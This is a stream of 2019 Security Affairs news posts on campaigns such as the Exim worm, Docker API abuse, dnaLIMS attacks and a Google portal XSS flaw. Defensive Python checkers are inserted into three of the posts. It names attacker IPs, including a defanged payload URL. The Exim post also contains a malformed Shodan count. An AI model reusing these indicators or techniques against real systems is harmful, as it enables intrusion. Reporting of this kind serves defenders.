I am a computer security scientist with an intensive hacking background. I do have a MD in computer engineering and a PhD on computer security from University of Bologna. During my PhD program I worked for US Government (@ National Institute of Standards and Technology, Security Division) where I did intensive research in Malware evasion techniques and penetration testing of electronic voting systems.

I do have experience on security testing since I have been performing penetration testing on several US electronic voting systems. I’ve also been put in charge of testing the uVote voting system from the Italian Ministry of homeland security. I met Palantir Technologies where I was introduced to the Intelligence Ecosystem. I decided to amplify my cybersecurity experiences by diving into SCADA security issues with some of the biggest industrial conglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cybersecurity defence centers I’ve ever experienced! Now I technically lead Yoroi defending our customers, strongly believing in: Defence Belongs To Humans

Edited by Pierluigi Paganini

(Security Affairs – targeted attack, hacking)



The post From Targeted Attack to Untargeted Attack appeared first on Security Affairs.

Hacker is targeting DNA sequencer applications from Iranian IP address

Threat actors are targeting Web-based DNA sequencer applications leveraging a still-unpatched zero-day to take over the targeted systems.

Starting on June 12, 2019, researcher Ankit Anubhav of NewSky Security observed threat actors targeting web-based DNA sequencer applications. The attackers are exploiting a vulnerability, tracked as CVE-2017-6526, that was disclosed in 2017 but remains unpatched, to gain full control over the targeted systems.

The vulnerability in dnaLIMS was reported to the vendor in 2017, but it is still unpatched.

The attackers are scanning the Internet for dnaLIMS, a web-based application used by research laboratories to manage DNA sequencing operations. The attacks originate from the IP address 2.176.78.42, which is located in Iran.

“From June 12 – 14, we saw regular attacks from 2.176.78.42 , an IP located in Iran, utilizing CVE-2017-6526, an issue in dnaTools dnaLIMS 4-2015s13. According to dnatools.com, dnaLIMS™ is a Web based bioinformatics LIMS that provides scientists and researches with hardware independent software tools for processing and managing DNA sequencing requests.” reads a blog post published by the expert.

The hackers leverage the vulnerability to bind a shell and take control of the web server.

Why DNA sequencing apps?

Attackers could be interested in stealing hashes of DNA sequences from the application’s database to resell them on the dark web, or simply in compromising the servers to add them to a botnet.

We cannot exclude that the threat actors behind these attacks are simply running exploits available online at random, in an attempt to compromise as many systems as possible.

It is still unclear why attackers are targeting DNA sequencing apps: the number of these devices is limited (only a few tens are exposed online), and it is unlikely that hackers want to use the compromised systems to carry out DDoS attacks.

“The exact motives of the attacker(s) is unknown. Unlike an IPCamera or Router based IoT device, these are very unique devices installed in scientific, academic and medical institutions. As a result, the number of such devices is not very high and might not help greatly in DDoS.” concludes the expert.

“However, successful exploitation and DNA theft in specific cases can be fruitful. Either it can be sold in black market, or a high profile attacker can actually be looking for a specific persons’ data.

We are not aware of a patch for this bug. In fact, when we had a look at the original disclosure by ShoreBreakSecurity, we saw a funny disclosure response by the vendor, indicating they don’t take DNA theft seriously.”

The expert also analyzed the historical activity of the attacker’s IP address and found it was also associated with nmap scans and with the use of two other exploits, one for Zyxel routers (CVE-2017-6884) and one for the Apache Struts flaw CVE-2017-5638.

Pierluigi Paganini

(SecurityAffairs – DNA sequencer applications, hacking)

The post Hacker is targeting DNA sequencer applications from Iranian IP address appeared first on Security Affairs.

Bella Thorne published her private nude photos before a hacker that was threatening her

Bella Thorne is the latest victim of a sextortion attempt: in a case reminiscent of the Fappening saga, a hacker threatened to publish her private nude photos.

The hacker obtained nude photos of Bella Thorne and threatened to leak them online, but her reply was not the one he expected.

Bella Thorne posted the stolen photos herself on Twitter, taking away the hacker’s leverage.

The actress explained that she had been harassed for the past 24 hours by a hacker who had obtained her nude photos.

bella thorne

The above message suggests that Bella Thorne has already reported to the authorities the sextortion attempts.

“For too long I let a man take advantage of me over and over and I’m f**king sick of it, I’m putting this out because it’s MY DECISION NOW U DONT GET TO TAKE YET ANOTHER THING FROM ME.” wrote the actress.

“I can sleep tonight better knowing I took my power back. U can’t control my life u never will.”

According to BleepingComputer, the hacker also shared with Thorne nude photos of other celebrities.

Pierluigi Paganini

(SecurityAffairs – Thorne, hacking)

The post Bella Thorne published her private nude photos before a hacker that was threatening her appeared first on Security Affairs.

New Echobot Botnet targets Oracle, VMware Apps and includes 26 Exploits

Operators behind the Echobot botnet have added new exploits to infect IoT devices and the enterprise applications Oracle WebLogic and VMware SD-WAN.

A new botnet, tracked as Echobot, recently appeared in the threat landscape; its operators keep adding exploits to infect a broad range of systems, including IoT devices and the enterprise applications Oracle WebLogic and VMware SD-WAN.

The Echobot botnet was first detected by experts at Palo Alto Networks early this month; it is based on the infamous Mirai botnet. At the time of its discovery, the operators had added 8 new exploits; the current version includes 26.

The popular expert Larry Cashdollar, from Akamai’s Security Intelligence Response Team (SIRT), spotted a new version of the Echobot botnet that counts 26 different exploits.

“I recently came across an updated version of the Echobot binary that had some interesting additions. The first binary I found was compiled for ARM and still had the debugging information intact, which made it a little easier to analyze. While examining that binary, I discovered the system hosting the binaries and downloaded an x86 version that also still had the debugging symbols intact.” wrote the expert.

“I counted 26 different exploits that were being used in the spread of this botnet. Most were well-known command execution vulnerabilities in various networked devices.”

Cashdollar published a table comparing the two versions of Echobot and the exploits they use.

[Image: Echobot targets]

The latest Echobot variant targets routers, network-attached storage devices (NAS), network video recorders (NVR), IP cameras, wireless presentation systems, and VoIP phones.

The expert pointed out that it was not simple to determine which vulnerabilities were being exploited by the botnet, because some of them had no CVE numbers assigned.

After he contacted MITRE, the organization assigned them identification numbers.

Below is the list of exploits included in the Echobot variant discovered by the expert; some of the flaws triggered by the bot are decade-old vulnerabilities:

[Image: Echobot]

The most interesting aspect of this new botnet is the fact that it also includes exploits for Oracle WebLogic Server and for the networking software VMware SD-WAN.

“What I found the most interesting, and not so surprising, is the inclusion of cross-application vulnerabilities. For example, rather than sticking to devices with embedded OSs like routers, cameras, and DVRs, IoT botnets are now using vulnerabilities in enterprise web (Oracle WebLogic) and networking software (VMware SD-WAN) to infect targets and propagate malware.” added the expert.

“Also of note is the inclusion of 10+ year old exploits for network devices that I believe may never have been patched by the vendors. This alludes to the botnet developers deliberately targeting unpatched legacy vulnerabilities.”

Botnet operators continue to implement new methods to make their malware more aggressive and to infect as many systems as possible. The latest Echobot variant targets flaws in IoT devices and in enterprise systems as well.

“Botnet developers are always looking for ways to spread malware. They are not just relying on exploiting new vulnerabilities that target IoT devices, but vulnerabilities in enterprise systems as well. Some of the new exploits they’ve added are older and have remained unpatched by the vendor. It seems the updates to Echobot are targeting systems that have possibly remained in service, but whose vulnerabilities were forgotten.” concluded the expert.

“This is an interesting tactic as these systems if found have remained vulnerable for years and will probably remain vulnerable for many more. Also, there are not just new exploitation vectors to examine but attack vectors as well. New weaknesses in popular protocols and services that can be leveraged to amplify and reflect attacks will be discovered.”

Pierluigi Paganini

(SecurityAffairs – Echobot botnet, IoT)


Linux worm spreading via Exim servers hit Azure customers

On Friday, security experts at Microsoft warned of a new Linux worm, spreading via Exim email servers, that has already compromised some Azure installs.

Bad actors continue to target cloud services in an attempt to abuse them for several malicious purposes, such as storing malware or hosting command and control servers.

Microsoft Azure is not immune: experts recently reported several attacks leveraging the platform to host tech-support scams and phishing templates.

Researchers had already warned of the presence of some malware on the Microsoft Azure platform.

At the end of last week, Microsoft warned of a new Linux worm, spreading via Exim servers, that has already compromised some Azure installs.

Recently, security experts reported ongoing attacks targeting millions of mail servers running vulnerable Exim mail transfer agent (MTA) versions; different groups of hackers are exploiting the CVE-2019-10149 flaw to take them over.

The critical vulnerability affects versions 4.87 to 4.91 of the Exim mail transfer agent (MTA) software. The flaw could be exploited by unauthenticated remote attackers to execute arbitrary commands on mail servers for some non-default server configurations.

[Image: Exim CVE-2019-10149]

The CVE-2019-10149 issue resides in the deliver_message() function in /src/deliver.c and is caused by improper validation of recipient addresses. The flaw could lead to remote code execution with root privileges on the mail server; unfortunately, the vulnerability is easily exploitable by both local and remote attackers in certain non-default configurations.

The CVE-2019-10149 flaw was addressed by the Exim development team with the release of version 4.92 in February, but a large number of operating systems are still affected by the flaw.

“CVE-2019-10149, which was first discovered on June 5, is now being used as the vulnerability for a widespread campaign to attack exim servers and propagate across the Internet.” reads a blog post published by Cybereason.

“We are aware of an initial wave of attacks as described by Freddie Leeman on June 9, 2019. The first hacker group began pushing exploits from a C2 server located on the clear web. A second round of attacks by a different attacker are being analyzed by the Nocturnus team.”

Attackers are scanning the internet for vulnerable mail servers; once a server is compromised, the initially deployed script downloads a second script designed to check whether OpenSSH is installed on the compromised machine.

If OpenSSH is not present, the script installs and starts it to gain root logins via SSH, using an RSA public/private key pair for authentication.

Microsoft has now detected a Linux worm that leverages the above flaw in vulnerable Linux Exim email servers in a cryptojacking campaign.

“This week, MSRC confirmed the presence of an active Linux worm leveraging a critical Remote Code Execution (RCE) vulnerability, CVE-2019-10149, in Linux Exim email servers running Exim version 4.87 to 4.91. Azure customers running VMs with Exim 4.92 are not affected by this vulnerability.” reads the advisory published by Microsoft.

Microsoft pointed out that Azure has already implemented controls to limit the spread of this Linux worm, but urges customers to use up-to-date software to prevent infection.

“Customers using Azure virtual machines (VMs) are responsible for updating the operating systems running on their VMs.” continues the advisory. “As this vulnerability is being actively exploited by worm activity, MSRC urges customers to observe Azure security best practices and patterns and to patch or restrict network access to VMs running the affected versions of Exim.”

Pierluigi Paganini

(SecurityAffairs – Exim, Linux worm)


Security Affairs newsletter Round 218 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.


Critical RCE affects older Diebold Nixdorf ATMs
Facebook is going to stop Huawei pre-installing apps on mobile devices
Millions of Exim mail servers vulnerable to cyber attacks
CIA sextortion campaign, analysis of a well-organized scam
CVE-2019-12735 – opening a specially crafted file in Vim or Neovim Editor could compromise your Linux system
Microsoft warns of spam campaign exploiting CVE-2017-11882 flaw
Retro video game website Emuparadise suffered a data breach
Shanghai Jiao Tong University data leak – 8.4TB in email metadata exposed
Spain extradites 94 Taiwanese to China phone and online fraud charges
Adobe Patch Tuesday updates fix code execution issues in Campaign, ColdFusion, and Flash
Customs and Border Protection (CBP) confirms hack of a subcontractor
CVE-2019-2725 Oracle WebLogic flaw exploited in cryptojacking campaign
How Ursnif Evolves to Keep Threatening Italy
MuddyWater APT group updated its multi-stage PowerShell backdoor Powerstats
Vulnerability in WordPress Live Chat Plugin allows to steal and hijack sessions
FIN8 Hacking Group is back with an improved version of the ShellTea Backdoor
Google expert disclosed details of an unpatched flaw in SymCrypt library
Microsoft Patch Tuesday security updates for June 2019 fix 88 flaws
Radiohead releases a trove of stolen music in response to the hack
RAMBleed, a new Side-Channel Attack that allows stealing sensitive data
Flaw in Evernote Web Clipper for Chrome extension allows stealing data
Massive DDos attack hit Telegram, company says most of junk traffic is from China
Ransomware paralyzed production for at least a week at ASCO factories
WAGO Industrial Switches affected by multiple flaws
Dissecting NanoCore Crimeware Attack Chain
French authorities released the PyLocky decryptor for versions 1 and 2
Millions of Exim mail servers are currently under attack
Mozilla addressed flaws in Thunderbird that allow code execution
Yubico is replacing for free YubiKey FIPS devices due to security weakness
Xenotime threat actor now is targeting Electric Utilities in US and APAC

(SecurityAffairs – newsletter)


XSS flaw would have allowed hackers access to Google’s network and impersonate its employees

Bug hunter Thomas Orlita discovered an XSS vulnerability in Google's Invoice Submission Portal that would have allowed attackers to access Google's internal network.

The Czech researcher Thomas Orlita discovered an XSS vulnerability in Google's Invoice Submission Portal that would have allowed attackers to access part of Google's internal network.

The Google Invoice Submission Portal is a public portal used by Google's business partners to submit invoices.

An attacker could also have exploited the flaw to steal Google employees' cookies for internal apps, hijack accounts, or send spear-phishing messages.

The attack was devised by the expert in February, and Google addressed the issue in mid-April after the researcher reported it to the tech giant.

Orlita explained that an attacker could have uploaded malformed files to the Google Invoice Submission Portal via the Upload Invoice field.

The expert noticed that the 'upload' feature for actual invoices in PDF format could be abused to upload HTML files. The attacker had to intercept the request and change the uploaded file's filename and Content-Type properties to HTML.

Using this trick, it was possible to store malicious files in Google's invoicing system that would have executed automatically when an employee tried to access them.

[Image: Google xss Invoice Submission Portal]

“Since this is just a front-end validation, it doesn’t stop us from changing the file type when sending the upload POST request. Once we select any PDF file, an upload request is fired. We can intercept the request using a web proxy debugger and change the filename and the contents from .pdf to .html.” reads the analysis published by the expert.

Orlita uploaded an HTML file including an XSS payload that, when triggered, would send him an email every time it was loaded.

A few days later, the expert received an email message showing that the JavaScript code in the XSS payload had been executed on the googleplex.com domain.

This domain is used by Google to host internal websites and apps. Anyone attempting to access the domain is redirected to a Google Corp login page that requires authentication as a Google employee.

“The DOM of the page matches the XSS payload that was put instead of the PDF file. We can see that this URL is used for displaying a PDF file. But since the Content-Type of the uploaded file was changed from application/pdf to text/html, it displayed and rendered the XSS payload instead of the PDF.” continues the expert.

According to the researcher, it was possible to exploit the flaw to execute arbitrary code on behalf of Google employees and gain access to sensitive information.

The expert pointed out that many Google internal apps are hosted on the googleplex.com domain, making this issue a gift for attackers.

Below is the timeline for the flaw:
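The root cause described above is an upload check performed only in the browser, with the stored file later served under whatever Content-Type the client declared. The following is an added example, not code from Google or from the researcher, of how a server-side check can decide on the file's bytes alone and serve stored invoices with a fixed type; the size limit, the `%%EOF` trailer check and the sample inputs are constructed assumptions.

```python
import secrets
from dataclasses import dataclass

PDF_MAGIC = b"%PDF-"          # every PDF begins with this signature
PDF_TRAILER = b"%%EOF"        # and carries this marker near its end
MAX_UPLOAD_BYTES = 10 * 1024 * 1024  # assumed limit for an invoice upload


@dataclass(frozen=True)
class UploadDecision:
    accepted: bool
    reason: str
    stored_name: str = ""  # server-generated; the client's filename is never reused


def validate_invoice_upload(filename: str, declared_type: str, data: bytes) -> UploadDecision:
    """Server-side validation that does not trust the client-supplied filename or
    Content-Type: the bytes must look like a PDF whatever the request claims."""
    if len(data) > MAX_UPLOAD_BYTES:
        return UploadDecision(False, "file too large")
    if not filename.lower().endswith(".pdf"):
        return UploadDecision(False, "only .pdf invoices are accepted")
    # The declared media type is normalised and checked, but it is only advisory.
    media_type = declared_type.split(";", 1)[0].strip().lower()
    if media_type != "application/pdf":
        return UploadDecision(False, f"unexpected Content-Type {media_type!r}")
    # Content decides: an HTML document relabelled as PDF fails here.
    if not data.startswith(PDF_MAGIC):
        return UploadDecision(False, "content is not a PDF (missing %PDF- signature)")
    if PDF_TRAILER not in data[-1024:]:
        return UploadDecision(False, "content is not a complete PDF (missing %%EOF trailer)")
    # Store under a random name so nothing from the request reaches a path or URL.
    return UploadDecision(True, "ok", stored_name=secrets.token_hex(16) + ".pdf")


def download_headers(stored_name: str) -> dict:
    """Response headers for serving a stored invoice: the type is fixed server-side,
    browsers are told not to sniff, and the file is offered as a download rather
    than rendered inline on the serving origin."""
    return {
        "Content-Type": "application/pdf",
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": f'attachment; filename="{stored_name}"',
        # Even if a browser rendered the body, no script could run or reach the origin.
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }


# Constructed sample uploads (not real invoices).
SAMPLE_PDF = (
    b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog >>\nendobj\n"
    b"trailer\n<< /Root 1 0 R >>\nstartxref\n0\n%%EOF\n"
)
SAMPLE_HTML = b"<!DOCTYPE html><html><body>not an invoice</body></html>"


def demo() -> list:
    """Three cases: a real PDF, an HTML file sent as HTML (the intercepted-request
    trick from the write-up), and HTML relabelled as PDF to slip past name checks."""
    return [
        validate_invoice_upload("invoice.pdf", "application/pdf", SAMPLE_PDF).accepted,
        validate_invoice_upload("invoice.html", "text/html", SAMPLE_HTML).accepted,
        validate_invoice_upload("invoice.pdf", "application/pdf", SAMPLE_HTML).accepted,
    ]


if __name__ == "__main__":
    print(demo())  # [True, False, False]
```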

21.02.2019: Vulnerability reported
22.02.2019: Priority changed to P2 
22.02.2019: Added more information 
25.02.2019: Accepted and priority changed to P1 
06.03.2019: Reward issued 
26.03.2019: A fix has been implemented 
11.04.2019: Issue marked as fixed

Pierluigi Paganini

(SecurityAffairs – XSS, hacking)


Crooks exploit exposed Docker APIs to build AESDDoS botnet

Cybercriminals are attempting to exploit an API misconfiguration in Docker containers to infiltrate them and run the Linux bot AESDDoS.

Hackers are attempting to exploit an API misconfiguration in the open-source version of the popular DevOps tool Docker Engine-Community to infiltrate containers and run the Linux bot AESDDoS (Backdoor.Linux.DOFLOO.AA).

Threat actors are actively scanning the Internet for exposed Docker APIs on port 2375 and use them to deliver malicious code that drops the AESDDoS Trojan.

“In this new attack, the threat actor first externally scans a given IP range by sending a TCP SYN packet to port 2375, the default port used for communicating with the Docker daemon.” reads the analysis published by Trend Micro. “Once an open port is identified, a connection asking for running containers is established. When a running container is spotted, the AESDDoS bot is then deployed using the docker exec command, which allows shell access to all applicable running containers within the exposed host. Hence, the malware is executed within an already running container while trying to hide its own presence.”

The AESDDoS malware has been active since at least 2014 and was used to build large DDoS botnets; in some cases, it was also used in cryptojacking campaigns.

In recent months, threat actors focused their attention on misconfigured Docker services that could be abused for several malicious purposes.

“A batch file first executes the WinEggDrop scanner (s.exe), which tries port 2375 on various hosts with Chinese IP address ranges specified in the ip.txt file.” states the report. “The output of this command is saved into a file named ips.txt, which is then fed into the Docker.exe file.

We have also observed that the threat actor abuses a tool called the Docker Batch Test Tool that was developed to detect vulnerabilities in Docker.”

The malware also collects system information and sends it back to the C2; depending on the specific hardware configuration, the attackers can choose which kind of activity to carry out (e.g., launching DDoS attacks, mining cryptocurrency, etc.).

In the campaign observed by Trend Micro, the bot was deployed on misconfigured containers using the docker exec command.

The malware could allow the attackers to launch several types of DDoS attacks, including SYN, LSYN, UDP, UDPS, and TCP flood.

The analysis published by Trend Micro includes technical details of the attacks and a list of Indicators of Compromise (IOCs).

In March, hundreds of Docker hosts were compromised in cryptojacking campaigns exploiting the CVE-2019-5736 runc vulnerability disclosed in February.

In order to secure Docker hosts, admins should allow only trusted sources to access the Docker API; below are some recommendations provided by Trend Micro.

“Docker explicitly warns against setting the Docker daemon to listen on port 2375 as this will give anyone the ability to gain root access to the host where the daemon is running, hence access to the API and address must be heavily restricted.” concludes the report.

“To prevent container-based incidents from happening, organizations can follow these guidelines:

  • Check API configuration. 
  • Implement the principle of least privilege. 
  • Follow recommended best practices. 
  • Employ automated runtime and image scanning to gain further visibility into the container’s processes (e.g., to determine if it has been tampered with or has vulnerabilities).”
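The first guideline, "check API configuration", can be turned into a concrete audit of the daemon's listener settings. The following is an added example, not Trend Micro's or Docker's code: it reads the `hosts` and TLS keys from daemon.json and the `-H`/`--host`, `--tls` and `--tlsverify` options from the dockerd command line, and flags a TCP listener that is reachable without mutual TLS or bound to every interface. The sample configurations and certificate paths are constructed.

```python
import json
import shlex
from urllib.parse import urlsplit

WILDCARD_HOSTS = {None, "", "0.0.0.0", "::"}  # binds the API to every interface


def _hosts_from_argv(argv: list) -> list:
    """Collects listener addresses passed to dockerd as -H / --host."""
    hosts, it = [], iter(argv)
    for arg in it:
        if arg in ("-H", "--host"):
            hosts.append(next(it, ""))
        elif arg.startswith("--host="):
            hosts.append(arg.split("=", 1)[1])
        elif arg.startswith("-H") and len(arg) > 2:
            hosts.append(arg[2:])
    return hosts


def _flag(argv: list, name: str) -> bool:
    return any(a == name or a == f"{name}=true" for a in argv)


def audit_docker_daemon(daemon_json: str, cmdline: str) -> list:
    """Returns findings for a dockerd setup, given the text of daemon.json (may be
    empty) and the dockerd command line (e.g. the ExecStart of its systemd unit)."""
    cfg = json.loads(daemon_json) if daemon_json.strip() else {}
    argv = shlex.split(cmdline)[1:]  # drop the "dockerd" executable itself
    hosts = list(cfg.get("hosts", [])) + _hosts_from_argv(argv)
    tls = bool(cfg.get("tls")) or _flag(argv, "--tls")
    tlsverify = bool(cfg.get("tlsverify")) or _flag(argv, "--tlsverify")

    findings = []
    for host in hosts:
        url = urlsplit(host)
        if url.scheme != "tcp":
            continue  # unix:// and fd:// sockets are reachable only from the host itself
        if not tlsverify:
            # --tls alone encrypts the channel but accepts any client; only
            # --tlsverify demands a client certificate signed by tlscacert.
            how = ("with TLS but without client-certificate verification"
                   if tls else "unencrypted and unauthenticated")
            findings.append(f"HIGH: {host} exposes the Docker API {how}; anyone who can "
                            f"reach it gets root-equivalent access to the host")
        if url.hostname in WILDCARD_HOSTS:
            findings.append(f"MEDIUM: {host} listens on all interfaces; bind it to a "
                            f"management address or restrict port {url.port or 2375} "
                            f"with a firewall")
    return findings


# Constructed configurations: the exposed setup described in the article and a
# corrected one (mutual TLS on 2376, bound to a management address).
EXPOSED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],
})
HARDENED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",            # constructed paths
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})

if __name__ == "__main__":
    for f in audit_docker_daemon(EXPOSED_DAEMON_JSON, "dockerd"):
        print(f)
    print("hardened:", audit_docker_daemon(HARDENED_DAEMON_JSON, "dockerd"))  # []
```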

Pierluigi Paganini

(SecurityAffairs – containers, hacking)


Xenotime threat actor now is targeting Electric Utilities in US and APAC

Experts at Dragos reported that the Xenotime threat actor behind the 2017 Trisis/Triton malware attack is targeting electric utilities in the US and APAC.

The Xenotime threat actor is considered responsible for the 2017 Trisis/Triton malware attack that hit oil and gas organizations.

In December 2017, the Triton malware (aka Trisis) was discovered by researchers at FireEye; it was specifically designed to target industrial control systems (ICS).

Security experts at CyberX who analyzed samples of the malware provided further details on the attack, revealing that Triton was likely developed by Iran and used to target an organization in Saudi Arabia.

In October 2018, FireEye experts discovered a link between the Triton malware, tracked by the company as TEMP.Veles, and the Central Scientific Research Institute of Chemistry and Mechanics (CNIIHM), which is a Russian government research institute in Moscow.

Now, according to security firm Dragos, the group is targeting electric utilities in the United States and the Asia-Pacific (APAC) region.

“In February 2019, while working with clients across various utilities and regions, Dragos identified a persistent pattern of activity attempting to gather information and enumerate network resources associated with US and Asia-Pacific electric utilities.” reads a blog post published by Dragos.

“This behavior could indicate the activity group was preparing for a further cyberattack, or at minimum satisfying the prerequisites for a future ICS-focused intrusion.”

Xenotime has been active since at least 2014; its activity was discovered in 2017 after it caused a shutdown at a critical infrastructure organization in Saudi Arabia.

The group used a piece of malware known as Trisis, Triton and HatMan, and it targeted Schneider Electric's Triconex safety instrumented systems (SIS) through a zero-day vulnerability. The attack was discovered after a SIS triggered a shutdown of some industrial systems, which experts believe the hackers caused by accident.

[Image: Triton Xenotime]

Dragos experts revealed that the attacks against entities in the United States and the APAC region were similar to the ones that targeted organizations in the oil and gas sector. The good news is that all the attacks carried out by the Xenotime group failed to breach the targeted organizations.

“The activities are consistent with Stage 1 ICS Cyber Kill Chain reconnaissance and initial access operations, including observed incidents of attempted authentication with credentials and possible credential ‘stuffing,’ or using stolen usernames and passwords to try and force entry into target accounts.” continues the report.

Dragos warns that Xenotime poses a serious threat to electric utilities that use ICS/SCADA systems similar to those in the oil and gas industry.

“Electric utility environments are significantly different from oil and gas operations in several aspects, but electric operations still have safety and protection equipment that could be targeted with similar tradecraft. XENOTIME expressing consistent, direct interest in electric utility operations is a cause for deep concern given this adversary’s willingness to compromise process safety – and thus integrity – to fulfill its mission.” continues the experts.

Dragos presented research on Xenotime at SecurityWeek's 2018 ICS Cyber Security Conference, held in Atlanta; a video of the presentation accompanied the original post.

“Dragos emphasizes that the observed behavior is an expansion, a proliferation of the threat, and not a shift – oil and gas entities must still grapple with this adversary’s activity.” concludes Dragos. “While unfortunate, the expansion should serve as a clear signal to ICS operators – not only in oil and gas or electric utility operations – that the time to plan, implement, and enforce security standards and response processes in industrial environments is now.”

Pierluigi Paganini

(SecurityAffairs – Triton malware, Xenotime)


Mozilla addressed flaws in Thunderbird that allow code execution

Mozilla released security updates for the Thunderbird email client that address vulnerabilities that could allow code execution on impacted systems. 

Mozilla released security updates for the Thunderbird email client that address vulnerabilities that could be exploited by attackers to execute arbitrary code on impacted systems. 

Mozilla released Thunderbird version 60.7.1 that addresses three High severity vulnerabilities and one Low risk issue. 

The three High severity vulnerabilities addressed by Mozilla are:

  • CVE-2019-11703 – heap buffer overflow in icalparser.c;
  • CVE-2019-11704 – heap buffer overflow in icalvalue.c;
  • CVE-2019-11705 – stack buffer overflow in calrecur.c.

The Low risk issue, tracked as CVE-2019-11706, is a type confusion in icalproperty.c.

“Mozilla has released a security update to address vulnerabilities in Thunderbird. An attacker could exploit these vulnerabilities to take control of an affected system.” reads the advisory published by the US-CERT.

“The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Mozilla Security Advisory for Thunderbird 60.7.1 and apply the necessary update.” 

The vulnerabilities affect all the Thunderbird versions prior to 60.7.1.  

Depending on the user’s privileges, an attacker could carry out several malicious activities, such as installing malicious applications and creating new admin accounts. 

Mozilla credited the researcher Luis Merino of X41 D-Sec for the discovery of the above flaws. The vulnerabilities affect the implementation of iCal functions; they could be used to cause a crash when processing specially crafted email messages.

The expert pointed out that the flaws cannot be triggered via email in Thunderbird because scripting is disabled when reading mail. The issues could be exploitable in browser or browser-like contexts.

The good news is that Mozilla is not aware of any attacks exploiting the flaws in the wild.

Pierluigi Paganini

(SecurityAffairs – Thunderbird, hacking)


Millions of Exim mail servers are currently under attack

Hackers are targeting millions of mail servers running vulnerable Exim mail transfer agent (MTA) versions; threat actors are leveraging the CVE-2019-10149 flaw.

Millions of mail servers running vulnerable Exim mail transfer agent (MTA) versions are under attack; threat actors are exploiting the CVE-2019-10149 flaw to take them over.

A critical vulnerability affects versions 4.87 to 4.91 of the Exim mail transfer agent (MTA) software. The flaw could be exploited by unauthenticated remote attackers to execute arbitrary commands on mail servers for some non-default server configurations.

The CVE-2019-10149 issue resides in the deliver_message() function in /src/deliver.c and is caused by improper validation of recipient addresses. The issue could lead to remote code execution with root privileges on the mail server.

The flaw is easily exploitable by both local and remote attackers in certain non-default configurations; experts believe that threat actors will start using it in attacks in the wild.

The CVE-2019-10149 flaw was addressed by the Exim development team with the release of version 4.92 in February. Unfortunately, a large number of operating systems are still affected by the vulnerability.

Querying Shodan for vulnerable versions of Exim, it is possible to find 3,655,524 installs, most of them in the United States (1,984,5538).
Searching for patched Exim installs running the 4.92 release, we can find 1,795,332 systems.
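The Shodan counts above come from the version string advertised in the SMTP greeting, and the same triage can be run over an organisation's own inventory. The following is an added example, not code from Shodan, Exim or the article's sources: it parses constructed banner lines, places each version relative to the affected range (4.87 to 4.91) and the fixed release (4.92), and keeps the result labelled "likely" because distributions may backport the fix without changing the advertised version.

```python
import re
from collections import Counter

AFFECTED_MIN, AFFECTED_MAX, FIXED_IN = (4, 87), (4, 91), (4, 92)

# Matches "Exim 4.91", "Exim 4.86.2", "Exim 4.91_1" or "Exim 4.92-RC4" in a greeting;
# group 3 captures any patch level or suffix after major.minor.
EXIM_RE = re.compile(r"\bExim\s+(\d+)\.(\d+)([A-Za-z0-9._-]*)", re.IGNORECASE)


def classify_exim_banner(banner: str) -> str:
    """Classifies one SMTP 220 greeting against the CVE-2019-10149 version range."""
    m = EXIM_RE.search(banner)
    if not m:
        return "not-exim"
    version = (int(m.group(1)), int(m.group(2)))
    suffix = m.group(3).lower()
    if "rc" in suffix:
        # Release candidates fall outside the advisory's range; review them by hand.
        return "prerelease-review"
    if AFFECTED_MIN <= version <= AFFECTED_MAX:
        # "likely": vendors may ship a backported fix under the same version string,
        # so confirm against the package changelog before treating a host as exposed.
        return "likely-vulnerable"
    if version >= FIXED_IN:
        return "patched"
    # Older than 4.87: outside the affected range, but long out of support.
    return "outside-range"


def triage_banners(banners) -> Counter:
    """Counts hosts per category, the way the Shodan figures in the article are split."""
    return Counter(classify_exim_banner(b) for b in banners)


# Constructed greetings for the demonstration (not real hosts).
SAMPLE_BANNERS = [
    "220 mx1.example.test ESMTP Exim 4.91 Tue, 11 Jun 2019 10:00:00 +0000",
    "220 mx2.example.test ESMTP Exim 4.92 Tue, 11 Jun 2019 10:00:01 +0000",
    "220 mx3.example.test ESMTP Exim 4.86.2 Tue, 11 Jun 2019 10:00:02 +0000",
    "220 mx4.example.test ESMTP Exim 4.87 #1 Tue, 11 Jun 2019 10:00:03 +0000",
    "220 mx5.example.test ESMTP Postfix",
    "220 mx6.example.test ESMTP Exim 4.92-RC4 Tue, 11 Jun 2019 10:00:04 +0000",
]

if __name__ == "__main__":
    for banner in SAMPLE_BANNERS:
        print(f"{classify_exim_banner(banner):20} {banner}")
    print(dict(triage_banners(SAMPLE_BANNERS)))
```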

[Image: Exim]

“CVE-2019-10149, which was first discovered on June 5, is now being used as the vulnerability for a widespread campaign to attack exim servers and propagate across the Internet.” reads a blog post published by Cybereason.

“We are aware of an initial wave of attacks as described by Freddie Leeman on June 9, 2019. The first hacker group began pushing exploits from a C2 server located on the clear web. A second round of attacks by a different attacker are being analyzed by the Nocturnus team.”

Attackers are scanning the internet for vulnerable mail servers; once a server is compromised, the initially deployed script downloads a second script designed to check whether OpenSSH is installed on the compromised machine.

If OpenSSH is not present, the script installs and starts it to gain root logins via SSH, using an RSA public/private key pair for authentication.

Experts also observed another campaign carried out by a second group of attackers that is also targeting Exim servers.

The second stream of attacks was spotted by Freddie Leeman on June 9; in this wave, attackers were delivering the script used to exploit vulnerable Exim servers from 173[.]212[.]214[.]137/s.

“During the subsequent days, this group evolved its attacks, changing the type of malware and scripts it would download on infected hosts; a sign that they were still experimenting with their own attack chain and hadn’t settled on a particular exploit method and final goal.” reported ZDNet.

The attackers behind this second stream used multiple variants and continuously changed the scripts.

Pierluigi Paganini

(SecurityAffairs – Exim, hacking)


WAGO Industrial Switches affected by multiple flaws

A security expert at SEC Consult discovered that some WAGO industrial managed switches are affected by several serious vulnerabilities.

A security researcher at consulting company SEC Consult discovered several vulnerabilities in some models of WAGO industrial switches.

